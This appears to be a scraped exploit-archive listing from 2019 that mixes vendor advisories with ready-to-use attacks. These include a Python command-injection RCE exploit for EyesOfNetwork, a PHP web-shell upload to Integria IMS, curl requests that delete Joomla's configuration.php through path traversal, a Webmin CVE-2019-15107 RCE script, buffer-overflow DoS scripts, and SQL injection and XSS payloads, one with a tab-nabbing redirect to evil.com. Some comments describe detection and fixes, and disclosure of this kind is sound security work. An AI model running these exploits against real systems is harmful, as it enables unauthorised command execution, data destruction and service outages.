Adobe Acrobat Reader DC For Windows JP2 Stream Double-Free
EyesOfNetwork 5.1 Remote Command Execution
EyesOfNetwork version 5.1 authenticated remote command execution exploit.
2259218a24e60e9c5d94503f3acca3d0
# Exploit Title: EyesOfNetwork 5.1 - Authenticated Remote Command Execution
# Google Dork: N/A
# Date: 2019-08-14
# Exploit Author: Nassim Asrir
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: https://www.eyesofnetwork.com/?page_id=48&lang=fr
# Version: 5.1 < 5.0
# Tested on: Windows 10
# CVE : N/A
#About The Product:
''' EyesOfNetwork ("EON") is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application.
EyesOfNetwork Supervision is the first brick of a range of products aiming to assist IT management and governance.
EyesOfNetwork Supervision provides event management, availability, problems and capacity.
#Technical Analysis:
EyesOfNetwork allows Remote Command Execution via shell metacharacters in the module/tool_all/ host field.
By looking into tools/snmpwalk.php we will find the vulnerable part of code:
else{
$command = "snmpwalk -c $snmp_community -v $snmp_version $host_name";
}
In this line we can see that the attacker controls the value of the "$host_name" variable.
And after that we have the magic function "popen" in the next part of code.
$handle = popen($command,'r');
echo "<p>";<br />
while($read = fread($handle,100)){
echo nl2br($read);
flush();
}
pclose($handle);
Here we can see the "popen" call executing the value of $command; because the host name is interpolated unescaped, a shell metacharacter such as ";" at the end of it lets an OS command be appended.'''
#Exploit
import requests
import optparse
import sys
import bs4 as bs
# Command-line interface: target base URL, the OS command to run, and the
# credentials used to obtain an authenticated session. All four options are
# required (checked after parsing).
commandList = optparse.OptionParser('usage: %prog -t https://target:443 -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store",
                       help="Insert TARGET URL",
                       )
commandList.add_option('-c', '--cmd', action="store",
                       help="Insert command name",
                       )
commandList.add_option('-u', '--user', action="store",
                       help="Insert username",
                       )
commandList.add_option('-p', '--pwd', action="store",
                       help="Insert password",
                       )
options, remainder = commandList.parse_args()
# A missing option prints the usage text and exits with status 1.
if not options.target or not options.cmd or not options.user or not options.pwd:
    commandList.print_help()
    sys.exit(1)
url = options.target
cmd = options.cmd
user = options.user
pwd = options.pwd
# A single session object so the cookie set by login.php is reused by the
# second POST. Neither the initial GET nor the login response is checked, so a
# failed login surfaces only as an empty result further down.
with requests.session() as c:
    link=url
    initial=c.get(link)
    login_data={"login":user,"mdp":pwd}
    page_login=c.post(str(link)+"/login.php", data=login_data)
    # host_list is "127.0.0.1;" followed by the command: tools/snmpwalk.php
    # interpolates this value into $command and hands it to popen() (see the
    # technical analysis above). Detection/mitigation note: the distinguishing
    # feature of this request is a shell metacharacter inside the host_list
    # field of a POST to module/tool_all/select_tool.php; the server-side fix
    # is to validate host_list as a hostname/IP and escape it (escapeshellarg)
    # before building the command line.
    v_url=link+"/module/tool_all/select_tool.php"
    v_data = {"page": "bylistbox", "host_list": "127.0.0.1;"+cmd, "tool_list": "tools/snmpwalk.php", "snmp_com": "mm", "snmp_version": "2c", "min_port": "1", "max_port": "1024", "username": '', "password": '', "snmp_auth_protocol": "MD5", "snmp_priv_passphrase": '', "snmp_priv_protocol": '', "snmp_context": ''}
    page_v=c.post(v_url, data=v_data)
    # snmpwalk.php echoes the command output inside <p> tags (see the PHP
    # excerpt above), so the text of every <p> element is printed.
    # Python 2 print statement; this script does not run unchanged on Python 3.
    my=bs.BeautifulSoup(page_v.content, "lxml")
    for textarea in my.find_all('p'):
        final = textarea.get_text()
        print final
Integria IMS 5.0.86 Arbitrary File Upload
Integria IMS version 5.0.86 suffers from an arbitrary file upload vulnerability that allows for remote command execution.
e5093a3f5921350e30fd4ec8f1a6f85e
# Exploit Title: Integria IMS 5.0.86 - Arbitrary File Upload
# Date: 2019-08-16
# Exploit Author: Greg.Priest
# Vendor Homepage: https://integriaims.com/
# Software Link: https://sourceforge.net/projects/integria/files/5.0.86/
# Version: Integria IMS 5.0.86
# Tested on: Windows
# CVE : N/A
# ---------------------------------------------------------------------------------------
# http://10.61.184.30/integria//index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
# ---------------------------------------------------------------------------------------
# [Description]
# filemgr.php in Integria IMS 5.0.86, allows arbitrary file upload.
# index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
# ---------------------------------------------------------------------------------------
POST /integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload HTTP/1.1
Host: 10.61.184.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.61.184.30/integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
Content-Type: multipart/form-data; boundary=---------------------------30333176734664
Content-Length: 374
Connection: close
Cookie: PHPSESSID=1d31d410e9b85f1e9aaa53a2616a550e
Upgrade-Insecure-Requests: 1
-----------------------------30333176734664
Content-Disposition: form-data; name="curdir"
-----------------------------30333176734664
Content-Disposition: form-data; name="file"; filename="whoami.php"
Content-Type: application/octet-stream
<?php
$output = shell_exec('whoami');
echo "<pre>$output</pre>";
?>
-----------------------------30333176734664--
Web Wiz Forums 12.01 SQL Injection
Web Wiz Forums version 12.01 suffers from a remote SQL injection vulnerability.
02a536280795c152ac1767403e0624fc
# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
# Date: 2019-09-16
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
# Version: 12.01
# Tested on Windows
# Vulnerable parameter: PF (member_profile.asp)
# GET Request
GET /member_profile.asp?PF=10' HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
Connection: close
Upgrade-Insecure-Requests: 1
Joomla JS Jobs 1.2.6 Arbitrary File Delete
Joomla JS Jobs component version 1.2.6 suffers from an arbitrary file deletion vulnerability.
4aaff4d9cb1016b3b2f73bbdf2679d2f
# Exploit Title: Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion
# Dork: inurl:"index.php?option=com_jsjobs"
# Date: 2019-08-16
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.joomsky.com/
# Software Link: https://www.joomsky.com/5/download/1
# Version: 1.2.6
# Tested on: Debian/nginx/joomla 3.9.0
# Vulnerability details:
# This vulnerability is triggered when processing custom user fields.
File: site/models/job.php
Function: storeJob
Line: 1240
-------------------------------------
1215 //custom field code start
1216 $customflagforadd = false;
1217 $customflagfordelete = false;
1218 $custom_field_namesforadd = array();
1219 $custom_field_namesfordelete = array();
1220 $userfield = $this->getJSModel('customfields')->getUserfieldsfor(2);
1221 $params = array();
1222 $forfordelete = '';
1223
1224 foreach ($userfield AS $ufobj) {
1225 $vardata = '';
1226 if($ufobj->userfieldtype == 'file'){
1227 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 0){
1228 $vardata = $data[$ufobj->field.'_2'];
1229 }else{
1230 $vardata = $_FILES[$ufobj->field]['name'];
1231 }
1232 $customflagforadd=true;
1233 $custom_field_namesforadd[]=$ufobj->field;
1234 }else{
1235 $vardata = isset($data[$ufobj->field]) ? $data[$ufobj->field] : '';
1236 }
1237 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){
1238 $customflagfordelete = true;
1239 $forfordelete = $ufobj->field;
1240 $custom_field_namesfordelete[]= $data[$ufobj->field.'_2']; //No check.
1241 }
...snip...
1323 // new
1324 //removing custom field
1325 if($customflagfordelete == true){
1326 foreach ($custom_field_namesfordelete as $key) {
1327 $res = $this->getJSModel('common')->uploadOrDeleteFileCustom($row->id,$key ,1,2); //!!!
1328 }
1329 }
File: site/models/common.php
Function: uploadOrDeleteFileCustom
Line: 851
-------------------------------------
748 $path = $base . '/' . $datadirectory;
749 if (!file_exists($path)) { // create user directory
750 $this->makeDir($path);
751 }
752 $isupload = false;
753 $path = $path . '/data';
754 if (!file_exists($path)) { // create user directory
755 $this->makeDir($path);
756 }
757 if($for == 3 )
758 $path = $path . '/jobseeker';
759 else
760 $path = $path . '/employer';
761
762 if (!file_exists($path)) { // create user directory
763 $this->makeDir($path);
764 }
...snip...
843 } else { // DELETE FILES
844 if ($isdeletefile == 1) {
845 if($for == 3){
846 $userpath = $path . '/'.$datafor.'_' . $resumeid . '/customfiles/';
847 }else{
848 $userpath = $path . '/'.$datafor.'_' . $id . '/customfiles/';
849 }
850 $file = $userpath.$field;
851 unlink($file); //!!!
852 }
853 return 1;
854 }
855 }
#####################################
#PoC:
#####################################
# If an administrator has added a custom user field 'ufield926' with field type 'file', an attacker can trigger this vulnerability by sending the following requests.
$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926=@./valid_image.jpg' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1'"http://localhost/index.php"
$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=666' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926_1=1' -F 'ufield926_2=../../../../../configuration.php' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1'"http://localhost/index.php"
GetGo Download Manager 6.2.2.3300 Denial Of Service
GetGo Download Manager version 6.2.2.3300 suffers from a denial of service vulnerability.
e23572f028f1de4e1321a3d92de0af8d
# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service
# Date: 2019-08-15
# Author - Malav Vyas
# Vulnerable Software: GetGo Download Manager 6.2.2.3300
# Vendor Home Page: www.getgosoft.com
# Software Link: http://www.getgosoft.com/getgodm/
# Tested On: Windows 7 (64Bit), Windows 10 (64Bit)
# Attack Type : Remote
# Impact : DoS
# Co-author - Velayuthm Selvaraj
# 1. Description
# A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and
# earlier could allow remote NAS HTTP servers to perform a DoS via a long response.
# 2. Proof of Concept
import socket
from time import sleep
# Address and port the fake HTTP server listens on; the client under test has
# to be pointed at this listener.
host = "192.168.0.112"
port = 80
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, port))
sock.listen(1)
# Python 2 print statements throughout; blocks on accept() until one client
# connects.
print "\n[+] Listening on %d ..." % port
cl, addr = sock.accept()
print "[+] Connected to %s" % addr[0]
# The response is a status line whose reason phrase is 6000 'A' characters;
# per the header comment an over-long response is what the client mishandles.
# NOTE: `buffer` shadows the Python 2 builtin of the same name.
evilbuffer = "A" * 6000
buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n"
# Print up to 1000 bytes of whatever the client sent, then send the status line.
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
# Hold the connection open for 30 seconds before closing both sockets.
sleep(30)
cl.close()
sock.close()
GNU patch Command Injection / Directory Traversal
Open-Xchange OX Guard Cross Site Scripting / Signature Validation
Open-Xchange OX Guard versions 7.10.2 and below suffer from a cross site scripting vulnerability. Open-Xchange OX Guard versions 7.10.1 and below, 2.10.2 and below suffer from a signature validation vulnerability.
8a4509aba45a3f48bf32078dfdbc3fd1
Dear subscribers,
we're sharing our latest advisory with you and would like to thank everyone who contributed to finding and solving these vulnerabilities. Feel free to join our bug bounty programs (appsuite, dovecot, powerdns) at HackerOne.
Yours sincerely,
Martin Heiland, Open-Xchange GmbH
Product: OX Guard
Vendor: OX Software GmbH
Internal reference: 65132 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev48, 7.8.4-rev59, 7.10.0-rev32, 7.10.1-rev14, 7.10.2-rev5
Vendor notification: 2019-05-09
Solution date: 2019-06-13
Public disclosure: 2019-08-15
CVE reference: CVE-2018-9997
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
Vulnerability Details:
Curly brackets can be used to bypass XSS sanitization in HTML mail and other HTML attachments. A variation of the original issue has been found that is based on incorrect global event handler blacklist entries.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create a HTML mail with curly brackets that disguise event handlers in CSS
2. Make a App Suite user open the malicious mail
Proof of concept:
<div style=width:100%;height:10px;font:\"'/{/onMouseLeave=alert(1)//></div>
Solution:
We updated the list of blacklisted event handlers to close this bypass, operators may add a workaround by updating "globaleventhandlers.list" and change the incorrect handler "onmounseleave" to "onmouseleave".
--
Internal reference: 64992 (Bug ID)
Vulnerability type: Data validation fault (CWE-34)
Vulnerable version: 7.10.1 and earlier, 2.10.2 and earlier
Vulnerable component: guard, backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version (guard): 2.8.0-rev22, 2.10.1-rev7
Fixed version (backend): 7.8.4-rev59, 7.10.1-rev14
Vendor notification: 2019-05-03
Solution date: 2019-06-13
Public disclosure: 2019-08-15
Researcher Credits: Jens Müller, Marcus Brinkmann, Damian Poddebniak, Hanno Böck, Sebastian Schinzel, Juraj Somorovsky, and Jörg Schwenk
CVE reference: CVE-2019-11521
CVSS: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
Vulnerability Details:
Internal evaluation revealed that OX Guard is vulnerable to a subset of techniques used to display a valid signature from the identity of a trusted communication partner located in the mail header, although the crafted email is actually signed by an attacker. Our discoveries are based on work of a team of researchers, publishing these spoofing techniques under the "Johnny You Are Fired" project name.
Risk:
Recipients of signed PGP mail could be fooled into assuming the mail originates from a trusted source rather than an attacker. This would elevate the mail's trust level and potentially ease social-engineering attacks.
Steps to reproduce:
1. Create mails that contain valid signatures but originate from a different source
Proof of concept:
https://github.com/RUB-NDS/Johnny-You-Are-Fired/tree/master/04-id
Solution:
We improved validation and make sure mail with valid signatures is only evaluated to be "trusted" if the sender matches the signature issuer. We also extended our API to provide more information about a specific signature to let clients add checks and handle invalid signature information.
Open-Xchange OX App Suite Content Spoofing / Cross Site Scripting
Open-Xchange OX App Suite suffers from a content spoofing, cross site scripting, and information disclosure vulnerabilities. Versions affected vary depending on the vulnerability.
e4f984f70b4911993c1fb35b6018270a
Dear subscribers,
we're sharing our latest advisory with you and would like to thank everyone who contributed to finding and solving these vulnerabilities. Feel free to join our bug bounty programs (appsuite, dovecot, powerdns) at HackerOne.
Yours sincerely,
Martin Heiland, Open-Xchange GmbH
Product: OX App Suite
Vendor: OX Software GmbH
Internal reference: 64680 (Bug ID)
Vulnerability type: Content Spoofing (CWE-451)
Vulnerable version: 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-09
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11521
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
Vulnerability Details:
Appointment titles are rendered as a hyperlink but were missing protection against "tab nabbing".
Risk:
When following a hyperlink to a malicious website, the original tab location (OX App Suite) could be replaced with a URL chosen by the attacker. This can be exploited to trick users to re-enter credentials to a seemingly legitimate website and as a result take over accounts.
Steps to reproduce:
1. Create an appointment invitation that contains a link to a malicious website including a blank "target" attribute
2. Make the user accept the invitation and click the hyperlink at the appointments title
3. Provide an effective exploit to overwrite the user's original URL and fake a login page
Proof of concept:
Appointment title content:
<a href="//www.evil.com/window.html" target="_blank">Click Me! :-)
Payload:
<script>
window.opener.location.replace('//www.evil-fakelogin.com/');
</script>
Solution:
We extended the usage of existing protection mechanisms (blankshield) to this case.
---
Internal reference: 64682 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.0 and 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev31, 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-13
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11522
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
Vulnerability Details:
When replying to a HTML E-Mail with specific payload, that payload could be executed as script code. The user would have to have HTML composing enabled to exploit this vulnerability. This vulnerability could happen as browsers incorrectly "fix" HTML content as demonstrated by @kinugawamasato for Google Search.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create an E-Mail with malicious content and deliver it to the user
2. Make the user "reply" to the E-Mail
Proof of concept:
Test
<noscript><p class="xss">Another XSS!
<!-- --!
> <img src=x onerror=alert(document.domain)>
Solution:
We improved our filter and whitelisting mechanisms to block this kind of code from entering the browsers rendering engine.
---
Internal reference: 64703 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-13
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11522
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
Vulnerability Details:
When opening an embedded HTML E-Mail, sanitization mechanisms were not active.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create an E-Mail with malicious content and embed/attach it to another E-Mail
2. Make the user open the embedded E-Mail using OX App Suite's "View" feature
Proof of concept:
<img src=x onerror=alert(document.domain)>
Solution:
We now use existing filtering mechanisms when processing embedded or attached E-Mail.
---
Affected product: OX App Suite
Internal reference: 62465 (Bug ID)
Vulnerability type: Information Exposure (CWE-200)
Vulnerable version: 7.6.3 and later
Vulnerable component: driverestricted, backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version (driverestricted): 7.6.3-rev4, 7.8.3-rev8, 7.8.4-rev6, 7.10.0-rev5, 7.10.1-rev4
Fixed version (backend): 7.6.3-rev46, 7.8.3-rev56, 7.8.4-rev52, 7.10.0-rev31, 7.10.1-rev12
Vendor notification: 2019-01-14
Solution date: 2019-05-13
Public disclosure: 2019-08-15
CVE reference: CVE-2019-11806
CVSS: 3.3 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)
Vulnerability Details:
Bundles that contain private keys and passwords for OX Drive related push services were deployed without proper file-system permissions. We also fixed default file-system permissions for related configuration files that potentially contain passwords set by the operator.
Risk:
A user with non-privileged system-level access could access and extract the bundles (JAR files) and analyze their byte-code. From that it is possible to extract both the private key for APN certificates as well as their encryption password and GCM key/secret pairs. Extracting this does not open a specific attack vector, but we consider the information confidential and our handling did not adhere to our standards for that kind of information.
Steps to reproduce:
1. Use a non privileged user account to access an OX App Suite Middleware machine
2. Check file permissions for "driverestricted" bundles that contain secret keys and passwords
Solution:
We updated file-system level permissions for such bundles and configuration files.
MediaWiki OAuth2 Client 0.3 Cross Site Request Forgery
MediaWiki OAuth2 Client version 0.3 suffers from a cross site request forgery vulnerability.
46e749ce553be96c1690bf02ed0d0f80
[CVE-2019-15150] CSRF in MediaWiki extension OAuth2 Client 0.3
Happy Sunday everyone.
A security bulletin for you all.
Software:
--------
MediaWiki OAuth2 Client (https://github.com/Schine/MW-OAuth2Client)
Description:
----------
MediaWiki implementation of the PHP League's OAuth2 Client, to allow MediaWiki
to act as a client to any OAuth2 server.
Not Affected:
------------
0.2 and earlier.
Affected Versions:
---------------
0.3
Fixed Versions:
-------------
0.4
Problem:
--------
In the OAuth2 Client extension 0.3 for MediaWiki, a CSRF vulnerability
exists due to the OAuth2 state parameter not being checked in the callback
function.
Per OAuth 2.0 spec, the authorization code grant flow is susceptible to CSRF
and clickjacking attacks unless an appropriate "state" parameter is chosen and
verified.[1][2][3]
Although the software correctly generates an unguessable state value and sets
it in the URL to the OAuth 2.0 server, it fails to actually check/validate the
parameter in the callback against what it previously selected.
The regression was introduced when switching underlying vendor code.[4]
Impact:
-------
As described in the OAuth 2.0 RFC spec, this opens the site relying on the
software up to clickjacking and CSRF attacks.[1]
A successful attack can lead to loss of integrity of the user/victim.
Solution:
---------
Update callback function to verify presence and correct `state` value as
previously chosen prior to initiating the OAuth2 flow[5], as done in v0.4
release.[6]
Timeline:
---------
2019-08-17: Bug discovered
2019-08-17: CVE requested, assigned, privately disclosed to maintainer,
bugfix/patch authored
2019-08-18: Maintainer acknowledged, patched version 0.4 is released
Credit:
-------
Discovery by me.
Thanks to the maintainer Schine GmbH. for a quick acknowledgement and release.
References:
-----------
[1]: https://tools.ietf.org/html/rfc6749#section-10.12
[2]: https://auth0.com/docs/protocols/oauth2/mitigate-csrf-attacks
[3]: https://auth0.com/docs/protocols/oauth2/oauth-state
[4]: https://github.com/Schine/MW-OAuth2Client/commit/7188d6c8d359d41c6974c19b2c0907653bab8f6e
[5]: https://github.com/Schine/MW-OAuth2Client/commit/6a4fe4500ddd72ad4e826d9d63b2d69512bd10d1
[6]: https://github.com/Schine/MW-OAuth2Client/releases/tag/v0.4
--
Best Regards,
Justin Bull
PGP Fingerprint: E09D 38DE 8FB7 5745 2044 A0F4 1A2B DEAA 68FD B34C
Webmin Remote Command Execution
Webmin unauthenticated remote command execution exploit that identifies whether or not a target is vulnerable.
d3f8ab6c772881a15aae824b15be9760
#!/bin/sh
#
# CVE-2019-15107 Webmin Unauthenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a marker via an echo command and then greps the response for it. If it matches, the target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#
# Marker the injected echo prints back; its presence in the response body is
# the only signal used for the verdict.
FLAG="f3a0c13c3765137bcde68572707ae5c0"
# First positional argument, e.g. https://localhost:10000. Not validated or
# quoted anywhere below.
URI=$1;
# NOTE(review): `echo -n` and the `\033` escapes below are interpreted
# differently by different /bin/sh implementations (dash vs. bash); output may
# show a literal "-n" or literal escape sequences depending on the platform.
echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
# Unauthenticated POST to password_change.cgi with the marker embedded in the
# "old" field, response piped to grep. -k disables TLS certificate
# verification, -s silences curl's progress output; all output is discarded.
# Detection note: a POST to /password_change.cgi carrying expired=2 and a
# pipe character in the "old" parameter is the signature of this probe.
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1
# grep exits 0 only when the marker was found in the response body.
if [ $? -eq 0 ];
then
    # Red "VULNERABLE!"
    echo '\033[0;31mVULNERABLE!\033[0m'
else
    # Green "OK"; also printed when the request failed outright (no network,
    # wrong URL), since only grep's exit status is examined.
    echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
fi
#EOF
RAR Password Recovery 1.80 Denial Of Service
RAR Password Recovery version 1.80 suffers from a user name and registration code denial of service vulnerability.
c8006c83d8c82155250a442fd9ef4c2b
# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage:https://www.top-password.com/
# Software Link: https://www.top-password.com/download/RARPRSetup.exe
# Exploit Author: Achilles
# Tested Version: v1.80
# Tested on: Windows 7 x64
# Windows XP SP3
# 1.- Run python code :RAR Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open RAR Password Recovery and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 5.- Click 'OK' and you will see a crash.
#!/usr/bin/env python
# 6000 'A' bytes (0x41). NOTE: `buffer` shadows the Python 2 builtin of the
# same name.
buffer = "\x41" * 6000
# Writes the payload to Evil.txt in the working directory. The step list in
# the header refers to "EVIL.txt"; on case-sensitive filesystems the file
# actually created is "Evil.txt".
try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    # Bare except: every error (including KeyboardInterrupt) is swallowed and
    # reported only as this generic message; the handle is not closed on a
    # failed write.
    print "File cannot be created"
Kimai 2 Cross Site Scripting
Kimai version 2 suffers from a persistent cross site scripting vulnerability.
d467918811040b33c88487e63e4fa7b0
# Exploit Title: Kimai 2- persistent cross-site scripting (XSS)
# Date: 07/15/2019
# Exploit Author: osamaalaa
# Vendor Homepage: [link]
# Software Link: https://github.com/kevinpapst/kimai2
# Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962
# Version: 2
1-Normal user will try to add timesheet from this link http://localhost/index.php/en/timesheet/create
2-Add this payload "><svg/onload=alert('xss')> in the description
3-Save The changes
4-refresh and we have alert pop up!
The Request POC :
POST /index.php/en/timesheet/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 392
Connection: close
Referer: http://localhost
Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv
timesheet_edit_form[begin]=2019-08-17 13:02&timesheet_edit_form[end]=2019-08-18 00:00&timesheet_edit_form[customer]=12&timesheet_edit_form[project]=24&timesheet_edit_form[activity]=27&timesheet_edit_form[description]= "><svg/onload=alert('xss')>&timesheet_edit_form[tags]=&timesheet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0
Neo Billing 3.5 Cross Site Scripting
Neo Billing version 3.5 suffers from a persistent cross site scripting vulnerability.
7d47b4f46e7a051cb9a4041134f8126a
# Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability
# Date: 18.8.2019.
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
# Version: 3.5
# CWE : CWE-79
[Description]
# Neo Billing is an accounting, invoicing and CRM PHP script, with over 500 installations.
# Due to improper input fields data filtering, version 3.5 (and possibly previous versions), are affected by a stored XSS vulnerability.
[Proof of Concept]
# 1. Authorization as customer (regular user account) [//host/neo/crm/user/login]
# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket]
# 3. The code is stored and rendered at [//host/neo/crm/tickets] or [//host/neo/crm/tickets/thread/?id=ticketid]
[Example payloads]
# Example payload: "><img src="x" onerror="alert('XSS');">
# Example payload: "><script>alert(document.cookie)</script>
[POST Request]
POST /neo/crm/tickets/addticket HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: //host/neo/crm/tickets/addticket
Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523
Content-Length: 694
Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="title"
"><script>alert('XSS')</script>
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="content"
<p>"><script>alert('XSS')</script><br></p>
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream
-----------------------------899768029113033755249127523--
Mandos Encrypted File System Unattended Reboot Utility 1.8.8
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
dc129218c58f33b7c68e4cb7a34ecd6a
